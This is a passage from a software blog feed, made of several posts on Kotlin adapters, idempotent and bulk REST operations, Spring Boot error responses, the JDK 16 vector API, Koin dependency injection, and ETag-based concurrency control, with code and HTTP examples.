val adapters = mutableListOf<Adapter>()

Within the extension function we can now search the adapters list for a suitable adapter:


inline fun <reified T : Any> Any.adaptTo(): T {
    val adapter = adapters.find { it.canAdapt(this, T::class) }
            ?: throw NoSuitableAdapterFoundException(this, T::class)
    return adapter.adaptTo(this, T::class)
}

class NoSuitableAdapterFoundException(from: Any, to: KClass<*>)
    : Exception("No suitable adapter found to convert $from to type $to")

If an adapter is found that can be used for the requested conversion we call adaptTo(..) of the adapter and return the result. In case no suitable adapter is found a NoSuitableAdapterFoundException is thrown.

Example usage

Assume we want to convert JSON strings to Kotlin objects using the Jackson JSON library. A simple adapter might look like this:


class JsonToObjectAdapter : Adapter {
    private val objectMapper = ObjectMapper().registerModule(KotlinModule())

    override fun <T : Any> canAdapt(from: Any, to: KClass<T>) = from is String

    override fun <T : Any> adaptTo(from: Any, to: KClass<T>): T {
        require(canAdapt(from, to))
        return objectMapper.readValue(from as String, to.java)
    }
}

Now we can use our new extension method to convert a JSON string to a Person object:


data class Person(val name: String, val age: Int)

fun main() {
    // register available adapter at application start
    adapters.add(JsonToObjectAdapter())

    ...
    
    // actual usage
    val json = """
        {
            "name": "John",
            "age" : 42
        }
    """.trimIndent()

    val person = json.adaptTo<Person>()
}

You can find the source code of the examples on GitHub.

Within adapters.kt you find all the required pieces in case you want to try this on your own. In example-usage.kt you find some adapter implementations and usage examples.

Making POST and PATCH requests idempotent

2021-06-13T18:10:46Z

In an earlier post about idempotency and safety of HTTP methods we learned that idempotency is a positive API feature. It helps making an API more fault-tolerant as a client can safely retry a request in case of connection problems.

The HTTP specification defines GET, HEAD, OPTIONS, TRACE, PUT and DELETE methods as idempotent. From these methods GET, PUT and DELETE are the ones that are usually used in REST APIs. Implementing GET, PUT and DELETE in an idempotent way is typically not a big problem.

POST and PATCH are a bit different, neither of them is specified as idempotent. However, both can be implemented with regard of idempotency making it easier for clients in case of problems. In this post we will explore different options to make POST and PATCH requests idempotent.

Using a unique business constraint

The simplest approach to provide idempotency when creating a new resource (usually expressed via POST) is a unique business constraint.

For example, consider we want to create a user resource which requires a unique email address:


POST /users

{
    "name": "John Doe",
    "email": "john@doe.com"
}

If this request is accidentally sent twice by the client, the second request returns an error because a user with the given email address already exists. In this case, usually HTTP 400 (bad request) or HTTP 409 (conflict) is returned as status code.

Note that the constraint used to provide idempotency does not have to be part of the request body. URI parts and relationship can also help forming a unique constraint.

A good example for this is a resource that relates to a parent resource in a one-to-one relation. For example, assume we want to pay an order with a given order-id.

The payment request might look like this:


POST /order/<order-id>/payment

{
    ... (payment details)
}

An order can only be paid once so /payment is in a one-to-one relation to its parent resource /order/<order-id>. If there is already a payment present for the given order, the server can reject any further payment attempts.

Using ETags

Entity tags (ETags) are a good approach to make update requests idempotent. ETags are generated by the server based on the current resource representation. The ETag is returned within the ETag header value. For example:

Request


GET /users/123

Response


HTTP/1.1 200 Ok
ETag: "a915ecb02a9136f8cfc0c2c5b2129c4b"

{
    "name": "John Doe",
    "email": "john@doe.com"
}

Now assume we want to use a JSON Merge Patch request to update the users name:


PATCH /users/123
If-Match: "a915ecb02a9136f8cfc0c2c5b2129c4b"

{
    "name": "John Smith"
}

We use the If-Match condition to tell the server only to execute the request if the ETag matches. Updating the resource leads to an updated ETag on the server side. So, if the request is accidentally sent twice, the server rejects the second request because the ETag no longer matches. Usually HTTP 412 (precondition failed) should be returned in this case.

I explained ETags a bit more detailed in my post about avoiding issues with concurrent updates.

Obviously ETags can only be used if the resource already exists. So this solution cannot be used to ensure idempotency when a resource is created. On the good side this is a standardized and very well understood way.

Using a separate idempotency key

Yet another approach is to use a separate client generated key to provide idempotency. In this way the client generates a key and adds it to the request using a custom header (e.g. Idempotency-Key).

For example, a request to create a new user might look like this:


POST /users
Idempotency-Key: 1063ef6e-267b-48fc-b874-dcf1e861a49d

{
    "name": "John Doe",
    "email": "john@doe.com"
}

Now the server can persist the idempotency key and reject any further requests using the same key.

There are two questions to think about with this approach:

How to deal with requests that have not been completed successfully (e.g. by returning HTTP 4xx or 5xx status codes)? Should the idempotency key be saved by the server in these cases? If so, clients always need to use a new idempotency key if they want to retry requests.
What to return if the server retrieves a request with an already known idempotency key.

Personally I tend to save the idempotency key only if the request finished sucessfully. In the second case I would return HTTP 409 (conflict) to indicate that a request with the given idempotency key has already been executed.

However, opinions can be different here. For example, the Stripe API makes use of an Idempotency-Key header. Stripe saves the idempotency key and the returned response in all cases. If a provided idempotency key is already present, the stored response gets returned without executing the operation again.

The later can confuse the client in my opinion. On the other hand, it gives the client the option retrieve the response of a previously executed request again.

Summary

A simple unique business key can be used to provide idempotency for operations that create resources.

For non-creating operations we can use server generated ETags combined with the If-Match header. This approach has the advantage of being standardized and widely known.

As an alternative we can use a client generated idempotency key provided in a custom request header. The server saves those idempotency keys and rejects requests that contain an already used idempotency key. This approach can be used for all types of requests. However, it is not standardized and has some points to think about.

Interested in more REST related articles? Have a look at my REST API design page.

Providing useful API error messages with Spring Boot

2021-05-30T23:42:08Z

For API users it is quite important an API provides useful error messages. Otherwise, it can be hard to figure out why things do not work. Debugging what's wrong can quickly become a larger effort for the client than actually implementing useful error responses on the server side. This is especially true if clients are not able to solve the problem themself and additional communication is required.

Nonetheless this topic is often ignored or implemented halfheartedly.

Client and security perspectives

There are different perspectives on error messages. Detailed error messages are more helpful for clients while, from a security perspective, it is preferable to expose as little information as possible. Luckily those two views often do not conflict that much, when implemented correctly.

Clients are usually interested in very specific error messages if the error is produced by them. This should usually be indicated by a 4xx status code. Here, we need specific messages that point to the mistake made by the client without exposing any internal implementation detail.

On the other hand, if the client request is valid and the error is produced by the server (5xx status codes), we should be conservative with error messages. In this case, the client is not able to solve the problem and therefore does not require any details about the error.

A response indicating an error should contain at least two things: A human readable message and an error code. The first one helps the developer that sees the error message in the log file. The later allows specfic error processing on the client (e.g. showing a specific error message to the user).

How to build a useful error response in a Spring Boot application?

Assume we have a small application in which we can publish articles. A simple Spring controller to do this might look like this:


@RestController
public class ArticleController {

    @Autowired
    private ArticleService articleService;

    @PostMapping("/articles/{id}/publish")
    public void publishArticle(@PathVariable ArticleId id) {
        articleService.publishArticle(id);
    }
}

Nothing special here, the controller just delegates the operation to a service, which looks like this:


@Service
public class ArticleService {

    @Autowired
    private ArticleRepository articleRepository;

    public void publishArticle(ArticleId id) {
        Article article = articleRepository.findById(id)
                .orElseThrow(() -> new ArticleNotFoundException(id));

        if (!article.isApproved()) {
            throw new ArticleNotApprovedException(article);
        }

        ...
    }
}

Inside the service we throw specific exceptions for possible client errors. Note that those exception do not just describe the error. They also carry information that might help us later to produce a good error message:


public class ArticleNotFoundException extends RuntimeException {
    private final ArticleId articleId;

    public ArticleNotFoundException(ArticleId articleId) {
        super(String.format("No article with id %s found", articleId));
        this.articleId = articleId;
    }
    
    // getter
}

If the exception is specific enough we do not need a generic message parameter. Instead, we can define the message inside the exception constructor.

Next we can use an @ExceptionHandler method in a @ControllerAdvice bean to handle the actual exception:


@ControllerAdvice
public class ArticleExceptionHandler {

    @ExceptionHandler(ArticleNotFoundException.class)
    public ResponseEntity<ErrorResponse> onArticleNotFoundException(ArticleNotFoundException e) {
        String message = String.format("No article with id %s found", e.getArticleId());
        return ResponseEntity
                .status(HttpStatus.NOT_FOUND)
                .body(new ErrorResponse("ARTICLE_NOT_FOUND", message));
    }
    
    ...
}

If controller methods throw exceptions, Spring tries to find a method annotated with a matching @ExceptionHandler annotation. @ExceptionHandler methods can have flexible method signatures, similar to standard controller methods. For example, we can a HttpServletRequest request parameter and Spring will pass in the current request object. Possible parameters and return types are described in the Javadocs of @ExceptionHandler.

In this example, we create a simple ErrorResponse object that consists of an error code and a message.

The message is constructed based on the data carried by the exception. It is also possible to pass the exception message to the client. However, in this case we need to make sure everyone in the team is aware of this and exception messages do not contain sensitive information. Otherwise, we might accidentally leak internal information to the client.

ErrorResponse is a simple Pojo used for JSON serialization:


public class ErrorResponse {
    private final String code;
    private final String message;

    public ErrorResponse(String code, String message) {
        this.code = code;
        this.message = message;
    }

    // getter
}

Testing error responses

A good test suite should not miss tests for specific error responses. In our example we can verify error behaviour in different ways. One way is to use a Spring MockMvc test.

For example:


@SpringBootTest
@AutoConfigureMockMvc
public class ArticleExceptionHandlerTest {

    @Autowired
    private MockMvc mvc;

    @MockBean
    private ArticleRepository articleRepository;

    @Test
    public void articleNotFound() throws Exception {
        when(articleRepository.findById(new ArticleId("123"))).thenReturn(Optional.empty());

        mvc.perform(post("/articles/123/publish"))
                .andExpect(status().isNotFound())
                .andExpect(jsonPath("$.code").value("ARTICLE_NOT_FOUND"))
                .andExpect(jsonPath("$.message").value("No article with id 123 found"));
    }
}

Here, we use a mocked ArticleRepository that returns an empty Optional for the passed id. We then verify if the error code and message match the expected strings.

In case you want to learn more about testing spring applications with mock mvc: I recently wrote an article showing how to improve Mock mvc tests.

Summary

Useful error message are an important part of an API.

If errors are produced by the client (HTTP 4xx status codes) servers should provide a descriptive error response containing at least an error code and a human readable error message. Responses for unexpected server errors (HTTP 5xx) should be conservative to avoid accidental exposure any internal information.

To provide useful error responses we can use specific exceptions that carry related data. Within @ExceptionHandler methods we then construct error messages based on the exception data.

Supporting bulk operations in REST APIs

2022-08-09T21:51:23Z

Bulk (or batch) operations are used to perform an action on more than one resource in single request. This can help reduce networking overhead. For network performance it is usually better to make fewer requests instead of more requests with less data.

However, before adding support for bulk operations you should think twice if this feature is really needed. Often network performance is not what limits request throughput. You should also consider techniques like HTTP pipelining as alternative to improve performance.

When implementing bulk operations we should differentiate between two different cases:

Bulk operations that group together many arbitrary operations in one request. For example: Delete product with id 42, create a user named John and retrieve all product-reviews created yesterday.
Bulk operations that perform one operation on different resources of the same type. For example: Delete the products with id 23, 45, 67 and 89.

In the next section we will explore different solutions that can help us with both situations. Be aware that the shown solutions might not look very REST-like. Bulk operations in general are not very compatible with REST constraints as we operate on different resources with a single request. So there simply is no real REST solution.

In the following examples we will always return a synchronous response. However, as bulk operations usually take longer to process it is likely you are also interested in an asynchronous processing style. In this case, my post about asynchronous operations with REST might also be interesting to you.

Expressing multiple operations within the request body

Probably a way that comes to mind quickly is to use a standard data format like JSON to define a list of desired operations.

Let's start with a simple example request:


POST /batch


[
    {
        "path": "/products",
        "method": "post",
        "body": {
            "name": "Cool Gadget",
            "price": "$ 12.45 USD"
        }
    }, {
        "path": "/users/43",
        "method": "put",
        "body": {
            "name": "Paul"
        }
    },
    ...
]

We use a generic /batch endpoint that accepts a simple JSON format to describe desired operations using URIs and HTTP methods. Here, we want to execute a POST request to /products and a PUT request to /users/43.

A response body for the shown request might look like this:


[
    {
        "path": "/products",
        "method": "post",
        "body": {
            "id": 123,
            "name": "Cool Gadget",
            "price": "$ 12.45 USD"
        },
        "status": 201
    }, {
        "path": "/users/43",
        "method": "put",
        "body": {
            "id": 43,
            "name": "Paul"
        },
        "status": 200
    },
    ...
]

For each requested operation we get a result object containing the URI and HTTP method again. Additionally we get the status code and response body for each operation.

This does not look too bad. In fact, APIs like this can be found in practice. Facebook for example uses a similiar approach to batch multiple Graph API requests.

However, there are some things to consider with this approach:

How are the desired operations executed on the server side? Maybe it is implemented as simple method call. It is also possible to create a real HTTP requests from the JSON data and then process those requests. In this case, it is important to think about request headers which might contain important information required by the processing endpoint (e.g. authentication tokens, etc.).

Headers in general are missing in this example. However, headers might be important. For example, it is perfectly viable for a server to respond to a POST request with HTTP 201 and an empty body (see my post about resource creation). The URI of the newly created resource is usually transported using a Location header. Without access to this header the client might not know how to look up the newly created resource. So think about adding support for headers in your request format.

In the example we assume that all requests and responses use JSON data as body which might not always be the case (think of file uploads for example). As alternative we can define the request body as string which gives us more flexibility. In this case, we need to escape JSON double quotes which can be awkward to read:

An example request that includes headers and uses a string body might look like this:


[
    {
        "path": "/users/43",
        "method": "put",
        "headers": [{ 
            "name": "Content-Type", 
            "value": "application/json"
        }],
        "body": "{ \"name\": \"Paul\" }"
    },
    ...
]

Multipart Content-Type for the rescue?

In the previous section we essentially translated HTTP requests and responses to JSON so we can group them together in a single request. However, we can do the same in a more standardized way with multipart content-types.

A multipart Content-Type header indicates that the HTTP message body consists of multiple distinct body parts and each part can have its own Content-Type. We can use this to merge multiple HTTP requests into a single multipart request body.

A quick note before we look at an example: My example snippets for HTTP requests and responses are usually simplified (unnecessary headers, HTTP versions, etc. might be skipped). However, in the next snippet we pack HTTP requests into the body of a multipart request requiring correct HTTP syntax. Therefore, the next snippets use the exact HTTP message syntax.

Now let's look at an example multipart request containing two HTTP requests:


 1  POST http://api.my-cool-service.com/batch HTTP/1.1
 2  Content-Type: multipart/mixed; boundary=request_delimiter
 3  Content-Length: <total body length in bytes>
 4
 5  --request_delimiter
 6  Content-Type: application/http
 7  Content-ID: fa32d92f-87d9-4097-9aa3-e4aa7527c8a7
 8
 9  POST http://api.my-cool-service.com/products HTTP/1.1
10  Content-Type: application/json
11
12  {
13      "name": "Cool Gadget",
14      "price": "$ 12.45 USD"
15  }
16  --request_delimiter
17  Content-Type: application/http
18  Content-ID: a0e98ffb-0b62-42a1-a321-54c6e9ef4c99
19
20  PUT http://api.my-cool-service.com/users/43 HTTP/1.1
21  Content-Type: application/json
22
23  {
24    "section": "Section 2"
25  }
26  --request_delimiter--

Multipart content types require a boundary parameter. This parameter specifies the so-called encapsulation boundary which acts like a delimiter between different body parts.

Quoting the RFC:

The encapsulation boundary is defined as a line consisting entirely of two hyphen characters ("-", decimal code 45) followed by the boundary parameter value from the Content-Type header field.

In line 2 we set the Content-Type to multipart/mixed with a boundary parameter of request_delimiter. The blank line after the Content-Length header separates HTTP headers from the body. The following lines define the multipart request body.

We start with the encapsulation boundary indicating the beginning of the first body part. Next follow the body part headers. Here, we set the Content-Type header of the body part to application/http which indicates that this body part contains a HTTP message. We also set a Content-Id header which we can be used to identify a specific body part. We use a client generated UUID for this.

The next blank line (line 8) indicates that now the actual body part begins (in our case that's the embedded HTTP request). The first body part ends with the encapsulation boundary at line 16.

After the encapsulation boundary, follows the next body part which uses the same format as the first one.

Note that the encapsulation boundary following the last body part contains two additional hyphens at the end which indicates that no further body parts will follow.

A response to this request might follow the same principle and look like this:


 1  HTTP/1.1 200
 2  Content-Type: multipart/mixed; boundary=response_delimiter
 3  Content-Length: <total body length in bytes>
 4
 5  --response_delimiter
 6  Content-Type: application/http
 7  Content-ID: fa32d92f-87d9-4097-9aa3-e4aa7527c8a7
 8
 9  HTTP/1.1 201 Created
10  Content-Type: application/json
11  Location: http://api.my-cool-service.com/products/123
12
13  {
14      "id": 123,
15      "name": "Cool Gadget",
16      "price": "$ 12.45 USD"
17  }
18  --response_delimiter
19  Content-Type: application/http
20  Content-ID: a0e98ffb-0b62-42a1-a321-54c6e9ef4c99
21  
22  HTTP/1.1 200 OK
23  Content-Type: application/json
24
25  {
26      "id": 43,
27      "name": "Paul"
28  }
29  --response_delimiter--

This multipart response body contains two body parts both containing HTTP responses. Note that the first body part also contains a Location header which should be included when sending a HTTP 201 (Created) response status.

Multipart messages seem like a nice way to merge multiple HTTP messages into a single message as it uses a standardized and generally understood technique.

However, there is one big caveat here. Clients and the server need to be able to construct and process the actual HTTP messages in raw text format. Usually this functionality is hidden behind HTTP client libraries and server side frameworks and might not be easily accessible.

Bulk operations on REST resources

In the previous examples we used a generic /batch endpoint that can be used to modify many different types of resources in a single request. Now we will apply bulk operations on a specific set of resources to move a bit into a more rest-like style.

Sometimes only a single operation needs to support bulk data. In such a case, we can simply create a new resource that accepts a collection of bulk entries.

For example, assume we want to import a couple of products with a single request:


POST /product-import


[
    {
        "name": "Cool Gadget",
        "price": "$ 12.45 USD"
    },
    {
        "name": "Very cool Gadget",
        "price": "$ 19.99 USD"
    },
    ...
]

A simple response body might look like this:


[
    {
        "status": "imported",
        "id": 234235
        
    },
    {
        "status": "failed"
        "error": "Product name too long, max 15 characters allowed"
    },
    ...
]

Again we return a collection containing details about every entry. As we provide a response to a specific operation (importing products) there is not need to use a generic response format. Instead, we can use a specific format that communicates the import status and potential import errors.

Partially updating collections

In a previous post we learned that PATCH can be used for partial modification of resources. PATCH can also use a separate format to describe the desired changes.

Both sound useful for implementing bulk operations. By using PATCH on a resource collection (e.g. /products) we can partially modify the collection. We can use this to add new elements to the collection or update existing elements.

For example we can use the following snippet to modify the /products collection:


PATCH /products


[
    {
        "action": "replace",
        "path": "/123",
        "value": {
            "name": "Yellow cap",
            "description": "It's a cap and it's yellow"
        }        
    },
    {
        "action": "delete",
        "path": "/124",
    },
    {
        "action": "create",
        "value": {
            "name": "Cool new product",
            "description": "It is very cool!"
        }
    }
]

Here we perform three operations on the /products collection in a single request. We update resource /products/123 with new information, delete resource /products/124 and create a completely new product.

A response might look somehow like this:


[
    {
        "action": "replace",
        "path": "/123",
        "status": "success"
    }, 
    {
        "action": "delete",
        "path": "/124",
        "status": "success"
    }, {
        "action": "create",
        "status": "success"
    }
]

Here we need to use a generic response entry format again as it needs to be compatible to all possible request actions.

However, it would be too easy without a huge caveat: PATCH requires changes to be applied atomically.

The RFC says:

The server MUST apply the entire set of changes atomically and never provide [..] a partially modified representation. If the entire patch document cannot be successfully applied, then the server MUST NOT apply any of the changes.

I usually would not recommend to implement bulk operation in an atomic way as this can increase complexity a lot.

A simple workaround to be compatible with the HTTP specifications is to create a separate sub-resource and use POST instead of PATCH.

For example:


POST /products/batch

(same request body as the previous PATCH request)

If you really want to go the atomic way, you might need to think about the response format again. In this case, it is not possible that some requested changes are applied while others are not. Instead you need to communicate what requested changes failed and which could have been applied if everything else would have worked.

In this case, a response might look like this:


[
    {
        "action": "replace",
        "path": "/123",
        "status": "rolled back"
    }, 
    {
        "action": "delete",
        "path": "/124",
        "status": "failed",
        "error": "resource not found"
    },
    ..
]

Which HTTP status code is appropriate for responses to bulk requests?

With bulk requests we have the problem than some parts of the request might execute successfully while other fail. If everything worked it is easy, in this case we can simply return HTTP 200 OK.

Even if all requested changes fail it can be argued that HTTP 200 is still a valid response code as long as the bulk operation itself completed successfully.

In either way the client needs to process the response body to get detailed information about the processing status.

Another idea that might come in mind is HTTP 207 (Multi-status). HTTP 207 is part of RFC 4918 (HTTP extensions for WebDAV) and described like this:

A Multi-Status response conveys information about multiple resources in situations where multiple status codes might be appropriate. [..] Although '207' is used as the overall response status code, the recipient needs to consult the contents of the multistatus response body for further information about the success or failure of the method execution. The response MAY be used in success, partial success and also in failure situations.

So far this reads like a great fit.

Unfortunately HTTP 207 is part of the Webdav specification and requires a specific response body format that looks like this:


<?xml version="1.0" encoding="utf-8" ?>
<d:multistatus xmlns:d="DAV:">
    <d:response>
        <d:href>http://www.example.com/container/resource3</d:href>
        <d:status>HTTP/1.1 423 Locked</d:status>
        <d:error><d:lock-token-submitted/></d:error>
    </d:response>
</d:multistatus>

This is likely not the response format you want. Some might argue that it is fine to reuse HTTP 207 with a custom response format. Personally I would not recommend doing this and instead use a simple HTTP 200 status code.

In case you the bulk request is processed asynchronously HTTP 202 (Accepted) is the status code to use.

Summary

We looked at different approaches of building bulk APIs. All approaches have different up- and downsides. There is no single correct way as it always depends on your requirements.

If you need a generic way to submit multiple actions in a single request you can use a custom JSON format. Alternatively you can use a multipart content-type to merge multiple requests into a single request.

You can also come up with separate resources that that express the desired operation. This is usually the simplest and most pragmatic way if you only have one or a few operations that need to support bulk operations.

In all scenarios you should evaluate if bulk operations really produce the desired performance gains. Otherwise, the additional complexity of bulk operations is usually not worth the effort.

Interested in more REST related articles? Have a look at my REST API design page.

Looking into the JDK 16 vector API

2021-04-06T18:09:09Z

JDK 16 comes with the incubator module jdk.incubator.vector (JEP 338) which provides a portable API for expressing vector computations. In this post we will have a quick look at this new API.

Note that the API is in incubator status and likely to change in future releases.

Why vector operations?

When supported by the underlying hardware vector operations can increase the number of computations performed in a single CPU cycle.

Assume we want to add two vectors each containing a sequence of four integer values. Vector hardware allows us to perform this operation (four integer additions in total) in a single CPU cycle. Ordinary additions would only perform one integer addition in the same time.

The new vector API allows us to define vector operations in a platform agnostic way. These operations then compile to vector hardware instructions at runtime.

Note that HotSpot already supports auto-vectorization which can transform scalar operations into vector hardware instructions. However, this approach is quite limited and utilizes only a small set of available vector hardware instructions.

A few example domains that might benefit from the new vector API are machine learning, linear algebra or cryptography.

Enabling the vector incubator module (jdk.incubator.vector)

To use the new vector API we need to use JDK 16 (or newer). We also need to add the jdk.incubator.vector module to our project. This can be done with a module-info.java file:


module com.mscharhag.vectorapi {
    requires jdk.incubator.vector;
}

Implementing a simple vector operation

Let's start with a simple example:


float[] a = new float[] {1f, 2f, 3f, 4f};
float[] b = new float[] {5f, 8f, 10f, 12f};

FloatVector first = FloatVector.fromArray(FloatVector.SPECIES_128, a, 0);
FloatVector second = FloatVector.fromArray(FloatVector.SPECIES_128, b, 0);

FloatVector result = first
        .add(second)
        .pow(2)
        .neg();

We start with two float arrays (a and b) each containing four elements. These provide the input data for our vectors.

Next we create two FloatVectors using the static fromArray(..) factory method. The first parameter defines the size of the vector in bits (here 128). Using the last parameter we are able to define an offset value for the passed arrays (here we use 0)

In Java a float value has a size of four bytes (= 32 bits). So, four float values match exactly the size of our vector (128 bits).

After that, we can define our vector operations. In this example we add both vectors together, then we square and negate the result.

The resulting vector contains the values:


[-36.0, -100.0, -169.0, -256.0]

We can write the resulting vector into an array using the intoArray(..) method:


float[] resultArray = new float[4];
result.intoArray(resultArray, 0);

In this example we use FloatVector to define operations on float values. Of course we can use other numeric types too. Vector classes are available for byte, short, integer, float and double (ByteVector, ShortVector, etc.).

Working with loops

While the previous example was simple to understand it does not show a typical use case of the new vector API. To gain any benefits from vector operations we usually need to process larger amounts of data.

In the following example we start with three arrays a, b and c, each having 10000 elements. We want to add the values of a and b and store it in c: c[i] = a[i] + b[i].

Our code looks like this:


final VectorSpecies<Float> SPECIES = FloatVector.SPECIES_128;

float[] a = randomFloatArray(10_000);
float[] b = randomFloatArray(10_000);
float[] c = new float[10_000];

for (int i = 0; i < a.length; i += SPECIES.length()) {
    VectorMask<Float> mask = SPECIES.indexInRange(i, a.length);
    FloatVector first = FloatVector.fromArray(SPECIES, a, i, mask);
    FloatVector second = FloatVector.fromArray(SPECIES, b, i, mask);
    first.add(second).intoArray(c, i, mask);
}

Here we iterate over the input arrays in strides of vector length. A VectorMask helps us if vectors cannot be completely filled from input data (e.g. during the last loop iteration).

Summary

We can use the new vector API to define vector operations for optimizing computations for vector hardware. This way we can increase the number of computations performed in a single CPU cycle. Central element of the vector API are type specific vector classes like FloatVector or LongVector.

You can find the example source code on GitHub.

Kotlin dependency injection with Koin

2021-03-08T08:29:19Z

Dependency injection is a common technique in today's software design. With dependency injection we pass dependencies to a component instead of creating it inside the component. This way we can separate construction and use of dependencies.

In this post we will look at Koin, a lightweight Kotlin dependency injection library. Koin describes itself as a DSL, a light container and a pragmatic API.

Getting started with Koin

We start with adding the Koin dependency to our project:


<dependency>
    <groupId>org.koin</groupId>
    <artifactId>koin-core</artifactId>
    <version>2.2.2</version>
</dependency>

Koin artifacts are available on jcenter.bintray.com. If not already available you can add this repository with:


<repositories>
    <repository>
        <id>central</id>
        <name>bintray</name>
        <url>https://jcenter.bintray.com</url>
    </repository>
</repositories>

Or if you are using Gradle:


repositories {
    jcenter()    
}

dependencies {
    compile "org.koin:koin-core:2.2.2"
}

Now let's create a simple UserService class with a dependency to an AddressValidator object:


class UserService(
    private val addressValidator: AddressValidator
) {
    fun createUser(username: String, address: Address) {
        // use addressValidator to validate address before creating user
    }
}

AddressValidator simply looks like this:


class AddressValidator {
    fun validate(address: Address): Boolean {
        // validate address
    }
}

Next we will use Koin to wire both components together. We do this by creating a Koin module:


val myModule = module {
    single { AddressValidator() }
    single(createdAtStart = true) { UserService(get()) }
}

This creates a module with two singletons (defined by the single function). single accepts a lambda expression as parameter that is used to create the component. Here, we simply call the constructors of our previously defined classes.

With get() we can resolve dependencies from a Koin module. In this example we use get() to obtain the previously defined AddressValidator instance and pass it to the UserService constructor.

The createdAtStart option tells Koin to create this instance (and its dependencies) when the Koin application is started.

We start a Koin application with:


val app = startKoin {
    modules(myModule)
}

startKoin launches the Koin container which loads and initializes dependencies. One or more Koin modules can be passed to the startKoin function. A KoinApplication object is returned.

Retrieving objects from the Koin container

Sometimes it necessary to retrieve objects from the Koin dependency container. This can be done by using the KoinApplication object returned by the startKoin function:


// retrieve UserService instance from previously defined module
val userService = app.koin.get<UserService>()

Another approach is to use the KoinComponent interface. KoinComponent provides an inject method we use to retrieve objects from the Koin container. For example:


class MyApp : KoinComponent {
   
    private val userService by inject<UserService>()

    ...
}

Factories

Sometimes object creation is not as simple as just calling a constructor. In this case, a factory method can come in handy. Koin's usage of lambda expressions for object creation support us here. We can simply call factory functions from the lambda expression.

For example, assume the creation of a UserService instance is more complex. We can come up with something like this:


val myModule = module {

    fun provideUserService(addressValidator: AddressValidator): UserService {
        val userService = UserService(addressValidator)
        // more code to configure userService
        return userService
    }

    single { AddressValidator() }
    single { provideUserService(get()) }
}

As mentioned earlier, single is used to create singletons. This means Koin creates only one object instance that is then shared by other objects.

However, sometimes we need a new object instance for every dependency. In this case, the factory function helps us:


val myModule = module {
    factory { AddressValidator() }
    single { UserService(get()) }
    single { OtherService(get()) } // OtherService constructor takes an AddressValidator instance
}

With factory Koin creates a new AddressValidator objects whenever an AddressValidator is needed. Here, UserService and OtherService get two different AddressValidator instances via get().

Providing interface implementations

Let's assume AddressValidator is an interface that is implemented by AddressValidatorImpl. We can still write our Koin module like this:


val myModule = module {
    single { AddressValidatorImpl() }
    single { UserService(get()) }
}

This defines a AddressValidatorImpl instance that can be injected to other components. However, it is likely that AddressValidatorImpl should only expose the AddressValidator interface. This way we can enforce that other components only depend on AddressValidator and not on a specific interface implementation. We can accomplish this by adding a generic type to the single function:


val myModule = module {
    single<AddressValidator> { AddressValidatorImpl() }
    single { UserService(get()) }
}

This way we expose only the AddressValidator interface by creating a AddressValidatorImpl instance.

Properties and configuration

Obtaining properties from a configuration file is a common task. Koin supports loading property files and giving us the option to inject properties.

First we need to tell Koin to load properties which is done by using the fileProperties function. fileProperties has an optional fileName argument we can use to specify a path to a property file. If no argument is given Koin tries to load koin.properties from the classpath.

For example:


val app = startKoin {
   
    // loads properties from koin.properties
    fileProperties()
    
    // loads properties from custom property file
    fileProperties("/other.properties")
    
    modules(myModule)
}

Assume we have a component that requires some configuration property:


class ConfigurableComponent(val someProperty: String)

.. and a koin.properties file with a single entry:


foo.bar=baz

We can now retrieve this property and inject it to ConfigurableComponent by using the getProperty function:


val myModule = module {
    single { ConfigurableComponent(getProperty("foo.bar")) }
}

Summary

Koin is an easy to use dependency injection container for Kotlin. Koin provides a simple DSL to define components and injection rules. We use this DSL to create Koin modules which are then used to initialize the dependency injection container. Koin is also able to inject properties loaded from files.

For more information you should visit the Koin documentation page. You can find the sources for this post on GitHub.

REST API Design: Dealing with concurrent updates

2021-06-13T18:09:49Z

Concurrency control can be an important part of a REST API, especially if you expect concurrent update requests for the same resource. In this post we will look at different options to avoid lost updates over HTTP.

Let's start with an example request flow, to understand the problem:

We start with Alice and Bob requesting the resource /articles/123 from the server which responds with the current resource state. Then, Bob executes an update request based on the previously received data. Shorty after that, Alice also executes an update request. Alice's request is also based on the previously received resource and does not include the changes made by Bob. After the server finished processing Alice's update Bob's changes have been lost.

HTTP provides a solution for this problem: Conditional requests, defined in RFC 7232.

Conditional requests use validators and preconditions defined in specific headers. Validators are metadata generated by the server that can be used to define preconditions. For example, last modification dates or ETags are validators that can be used for preconditions. Based on those preconditions the server can decide if an update request should be executed.

For state changing requests the If-Unmodified-Since and If-Match headers are particularly interesting. We will learn how to avoid concurrent updates using those headers in the next sections.

Using a last modification date with an If-Unmodified-Since header

Probably the easiest way to avoid lost updates is the use of a last modification date. Saving the date of last modification for a resource is often a good idea so it is likely we already have this value in our database. If this is not the case, it is often very easy to add.

When returning a response to the client we can now add the last modification date in the Last-Modified response header. The Last-Modified header uses the following format:


<day-name>, <day> <month-name> <year> <hour>:<minute>:<second> GMT

For example:

Request:


GET /articles/123

Response:


HTTP/1.1 200 OK
Last-Modified: Sat, 13 Feb 2021 12:34:56 GMT

{
    "title": "Sunny summer",
    "text": "bla bla ..."
}

To update this resource the client now has to add the If-Unmodified-Since header to the request. The value of this header is set to the last modification date retrieved from the previous GET request.

Example update request:


PUT /articles/123
If-Unmodified-Since: Sat, 13 Feb 2021 12:34:56 GMT

{
    "title": "Sunny winter",
    "text": "bla bla ..."
}

Before executing the update, the server has to compare the last modification date of the resource with the value from the If-Unmodified-Since header. The update is only executed if both values are identical.

One might argue that it is enough to check if the last modification date of the resource is newer than the value of the If-Unmodified-Since header. However, this gives clients the option to overrule other concurrent requests by sending a modified last modification date (e.g. a future date).

A problem with this approach is that the precision of the Last-Modified header is limited to seconds. If multiple concurrent update requests are executed in the same second, we can still run into the lost update problem.

Using an ETag with an If-Match header

Another approach is the use of an entity tag (ETag). ETags are opaque strings generated by the server for the requested resource representation. For example, the hash of the resource representation can be used as ETag.

ETags are sent to the client using the ETag Header. For example:

Request:


GET /articles/123

Response:


HTTP/1.1 200 OK
ETag: "a915ecb02a9136f8cfc0c2c5b2129c4b"

{
    "title": "Sunny summer",
    "text": "bla bla ..."
}

When updating the resource, the client sends the ETag in a If-Match header back to the server:


PUT /articles/123
If-Match: "a915ecb02a9136f8cfc0c2c5b2129c4b"

{
    "title": "Sunny winter",
    "text": "bla bla ..."
}

The server now verifies that the ETag matches the current representation of the resource. If the ETag does not match, the resource state on the server has been changed between GET and PUT requests.

Strong and weak validation

RFC 7232 differentiates between weak and strong validation:

Weak validators are easy to generate but are far less useful for comparisons. Strong validators are ideal for comparisons but can be very difficult (and occasionally impossible) to generate efficiently.

Strong validators change whenever a resource representation changes. In contrast weak validators do not change every time the resource representation changes.

